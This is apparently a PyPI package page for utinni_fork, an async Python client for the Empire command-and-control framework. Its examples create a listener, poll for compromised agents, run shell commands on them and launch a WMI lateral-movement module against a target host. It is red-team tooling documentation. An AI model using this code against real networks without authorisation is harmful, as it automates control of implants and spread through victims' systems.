Async client library for Empire's RESTful API
Project description
This is a fork. The original repository can be found here
Utinni
An async Python client library for Empire's RESTful API
(Only works with the BC-Security Empire fork)
Sponsors
Table of Contents
Installing
Via Pip:
pip3 install utinni
Docker image:
docker pull byt3bl33d3r/utinni
Examples
See the examples folder for more.
Simple example showing basic usage:
import asyncio
from utinni import EmpireApiClient
async def main():
# Create client instance
empire = EmpireApiClient(host="localhost", port="1337")
# Login to Empire's RESTful API
await empire.login("username", "password")
print("* Logged into Empire")
# Create a listener
await empire.listeners.create(listener_type="http", name="Utinni", additional={"Port": 8443})
print("* Waiting for agents...")
while True:
# Poll for new agents every 1 sec
for agent in await empire.agents.get():
#Print some basic info on the new agent
print(f"+ New agent '{agent.name}' connected: {agent.domain}\\{agent.username}")
# Execute a module on the agent
module_output = await agent.execute(
"powershell/lateral_movement/invoke_wmi",
options={
"ComputerName": "targethost",
"Listener": "Utinni",
},
)
print(f"++ Executed invoke_wmi module on agent '{agent.name}'")
print(f"++ Module output: {module_output}")
await asyncio.sleep(1)
# Start the event loop
asyncio.run(main())
Example with background tasks:
import asyncio
from utinni import EmpireApiClient
async def agent_poller(empire):
# Poll for new agents every 1 sec
print("* Waiting for agents...")
while True:
for agent in await empire.agents.get():
#Print some basic info on the new agent
print(f"+ New agent '{agent.name}' connected: {agent.domain}\\{agent.username}")
# Do whatever you want with the agent object here and it won't block the main thread
# In this example executing we're executing a shell command
cmd_output = await agent.shell("dir")
print("++ Executed shell command")
print(f"++ Output: {cmd_output}")
await asyncio.sleep(1)
async def main():
# Create client instance
empire = EmpireApiClient(host="localhost", port="1337")
# Login to Empire's RESTful API
await empire.login("username", "password")
print("* Logged into Empire")
# Create a listener
await empire.listeners.create(listener_type="http", name="Utinni", additional={"Port": 8443})
# Start the 'agent_poller' coroutine as a background task
agent_poller_task = asyncio.create_task(agent_poller(empire))
# Do more stuff here as this thread isn't blocked.
available_empire_modules = await empire.modules.get()
# Wait for the agent_poller_task to complete
# in this example it won't ever finish since it's in a infinite loop.
await agent_poller_task
# Start the event loop
asyncio.run(main())
FAQ
1. Why?
This was originally made for the DeathStar project, the author then realized it would be useful as a stand-alone library.
2. Why doesn't this library provide a sync API?
Cause it doesn't make sense. In 99% of all use cases you're going to want to call/execute/query/do multiple things at the same time. This is legitimately the perfect use case of AsyncIO.
3. Will this work with the original Empire repository and not the BC-Security Fork?
Probably not. You're welcome to try though.
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
File details
Details for the file utinni_fork-0.5.2.tar.gz
.
File metadata
- Download URL: utinni_fork-0.5.2.tar.gz
- Upload date:
- Size: 17.8 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: poetry/1.7.0 CPython/3.11.6 Linux/6.5.0-3-amd64
File hashes
Algorithm | Hash digest | |
---|---|---|
SHA256 | 24fae03e9270373c96aeab5ca71610c1e4708f10a4e96c3d4a090716ea06ba33 |
|
MD5 | 594832d45f6ede581540c978f64070d7 |
|
BLAKE2b-256 | c4c75be636b56230c815a83d98418c9f9032a68432beec742e02cc735976ae98 |
File details
Details for the file utinni_fork-0.5.2-py3-none-any.whl
.
File metadata
- Download URL: utinni_fork-0.5.2-py3-none-any.whl
- Upload date:
- Size: 30.8 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: poetry/1.7.0 CPython/3.11.6 Linux/6.5.0-3-amd64
File hashes
Algorithm | Hash digest | |
---|---|---|
SHA256 | bb17a8ee9aee26a92296b009ef9ec9a3376425df209fcf0685cdb997f3249cbb |
|
MD5 | d272c4988f4bc29b86a5d11522d15851 |
|
BLAKE2b-256 | b52f9b5c71b52a0b2fddee34e9e80bea00d0ecec31106b98a5fbd09784019ced |